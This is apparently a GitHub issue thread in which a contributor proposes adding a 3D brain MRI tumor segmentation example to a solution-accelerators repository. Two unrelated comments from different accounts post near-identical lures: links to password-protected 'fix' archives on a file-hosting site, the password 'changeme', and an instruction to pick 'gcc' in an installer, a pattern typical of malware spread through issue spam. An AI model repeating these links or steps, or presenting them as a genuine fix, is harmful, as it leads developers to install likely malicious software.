### ISSUE TITLE
Add 3D Brain MRI solution

### ISSUE THREAD

**Issue by alemorm** [HPEEzmeral/solution-accelerators#8]
### Motivation

Support semantic 3D medical segmentation workflows by showcasing an example using 3D brain MRIs and tumor.

### Contribution

A pull request for this feature is on its way.

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
